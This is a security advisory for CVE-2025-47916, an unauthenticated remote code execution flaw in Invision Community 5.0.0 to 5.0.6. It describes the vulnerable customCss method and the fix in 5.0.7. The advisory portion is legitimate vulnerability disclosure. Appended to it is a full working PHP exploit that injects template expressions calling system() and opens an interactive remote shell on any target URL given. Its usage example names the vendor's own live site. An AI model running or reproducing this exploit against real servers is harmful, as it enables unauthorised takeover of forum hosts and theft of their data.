---------------------------------------------------------------------------
Invision Community <= 5.0.6 (customCss) Remote Code Execution Vulnerability
---------------------------------------------------------------------------


[-] Software Link:

https://invisioncommunity.com


[-] Affected Versions:

All versions from 5.0.0 to 5.0.6.


[-] Vulnerability Description:

The vulnerability is located in the
/applications/core/modules/front/system/themeeditor.php script.
Specifically, into the
IPS\core\modules\front\system\themeeditor::customCss() method. This
protected method can be invoked by unauthenticated users and passes the
value of the "content" request parameter to the
Theme::makeProcessFunction() method. As a result, the input is processed by
the template engine. This behavior can be exploited by unauthenticated
attackers to inject and execute arbitrary PHP code by supplying crafted
template strings.


[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2025-47916.php

Packet Storm Note: PoC appended below

[-] Solution:

Upgrade to version 5.0.7 or later.


[-] Disclosure Timeline:

[10/05/2025] - Vendor notified
[12/05/2025] - Version 5.0.7 released
[12/05/2025] - CVE identifier requested
[14/05/2025] - CVE identifier assigned
[14/05/2025] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2025-47916 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Other References:

https://invisioncommunity.com/release-notes-v5/507-r41/


[-] Original Advisory:

http://karmainsecurity.com/KIS-2025-02



---- proof of concept ----

<?php

/*
    ---------------------------------------------------------------------------
    Invision Community <= 5.0.6 (customCss) Remote Code Execution Vulnerability
    ---------------------------------------------------------------------------

    author..............: Egidio Romano aka EgiX
    mail................: n0b0d13s[at]gmail[dot]com
    software link.......: https://invisioncommunity.com

    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+

    [-] Original Advisory:

    https://karmainsecurity.com/KIS-2025-02
*/

set_time_limit(0);
error_reporting(E_ERROR);

print "\n+-------------------------------------------------------------------+";
print "\n| Invision Community <= 5.0.6 Remote Code Execution Exploit by EgiX |";
print "\n+-------------------------------------------------------------------+\n";

if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");

if ($argc != 2)
{
	print "\nUsage......: php $argv[0] <URL>\n";
	print "\nExample....: php $argv[0] http://localhost/invision/";
	print "\nExample....: php $argv[0] https://invisioncommunity.com/\n\n";
	die();
}

$ch = curl_init();

$params = ["app" => "core", "module" => "system", "controller" => "themeeditor", "do" => "customCss"];

curl_setopt($ch, CURLOPT_URL, $argv[1]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

while (1)
{
	print "\ninvision-shell# ";
	if (($cmd = trim(fgets(STDIN))) == "exit") break;
	$params["content"] = sprintf("{expression=\"die('________'.system(base64_decode('%s')))\"}", base64_encode($cmd));
	curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
	preg_match("/(.*)________/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}